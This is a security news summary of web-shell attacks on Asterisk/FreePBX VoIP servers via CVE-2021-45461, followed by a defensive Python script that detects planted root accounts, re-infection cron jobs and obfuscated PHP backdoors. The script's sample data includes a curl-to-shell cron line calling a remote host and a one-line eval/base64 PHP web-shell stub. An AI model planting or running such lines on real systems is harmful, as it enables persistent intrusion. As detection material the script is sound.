"VoIP Servers Being Targeted by Hackers Using Digium Phone Software"

As part of an attack intended to exfiltrate data by downloading and running additional payloads, a web shell was dropped on VoIP servers running Digium's phone software. According to a report released by Palo Alto Networks Unit 42, the malware downloads new payloads for execution, installs multilayer obfuscated PHP backdoors into the web server file system, and schedules recurring tasks to re-infect the host system. Asterisk, a popular software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server, is at the center of the unusual activity, which is said to have begun around the middle of December 2021. Comparing the breaches to the INJ3CTOR3 campaign, Unit 42 suggested that they could be a "resurgence" of earlier attacks. The sudden increase is due to the public disclosure in December 2021 of a now-patched Remote Code Execution (RCE) vulnerability in FreePBX, an open-source web-based Graphical User Interface (GUI) used to monitor and manage Asterisk. The vulnerability, CVE-2021-45461, has a severity rating of 9.8 out of 10. The attacks begin by retrieving an initial dropper shell script from a remote server; that script installs the PHP web shell in several locations across the file system and creates two root user accounts for continued remote access. This article continues to discuss hackers' use of Digium phone software to target VoIP servers.
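As an added defender-side check (not code from the CyberIntelMag or Unit 42 reports), the Python script below hunts for the three persistence artifacts the summary describes: extra UID-0 accounts, cron jobs that fetch and run remote content, and PHP files that feed decoded data into eval(). All file names, account names and the /etc/passwd, crontab and PHP samples are constructed for illustration.

```python
"""Hunt for persistence artifacts on a PBX host: planted UID-0 accounts,
re-infection cron jobs and obfuscated PHP backdoors. All sample data
below is constructed; point the functions at real files to use them."""
import re

# Constructed /etc/passwd excerpt: one legitimate root plus two planted UID-0 accounts.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin
svc-upd:x:0:0::/tmp:/bin/bash
mysql:x:27:27::/var/lib/mysql:/sbin/nologin
sysbak:x:0:0::/root:/bin/sh
"""

# Constructed crontab lines: a normal log rotation plus a re-infection job
# (198.51.100.7 is a documentation address, not a real indicator).
SAMPLE_CRON = """0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.7/d.sh | sh
"""

# Constructed PHP files: a harmless page and a layered-obfuscation backdoor stub.
SAMPLE_PHP = {
    "/var/www/html/index.php": "<?php echo 'Elastix'; ?>",
    "/var/www/html/.x.php": "<?php eval(gzinflate(base64_decode($_POST['k']))); ?>",
}

def extra_root_accounts(passwd_text):
    """Return login names other than 'root' whose UID field is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits

# A downloader (curl/wget) whose output is piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def suspicious_cron_lines(cron_text):
    """Return cron lines that download content and pipe it into a shell."""
    return [ln for ln in cron_text.splitlines() if FETCH_AND_RUN.search(ln)]

# eval()/assert() wrapped around a decoding primitive: typical of obfuscated web shells.
OBFUSCATION = re.compile(r"\b(eval|assert)\s*\(.*\b(base64_decode|gzinflate|str_rot13)\s*\(", re.S)

def obfuscated_php(files):
    """Return paths of PHP sources whose code feeds decoded data into eval()/assert()."""
    return sorted(path for path, src in files.items() if OBFUSCATION.search(src))

if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_root_accounts(SAMPLE_PASSWD))
    print("fetch-and-run cron jobs:", suspicious_cron_lines(SAMPLE_CRON))
    print("obfuscated PHP files:", obfuscated_php(SAMPLE_PHP))
```

Run against real data by reading /etc/passwd, the output of `crontab -l` for each user and the web root's .php files; any hit warrants an investigation rather than automatic deletion, since removing one artifact while the others remain lets the scheduled job re-infect the host.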

CyberIntelMag reports "VoIP Servers Being Targeted by Hackers Using Digium Phone Software"
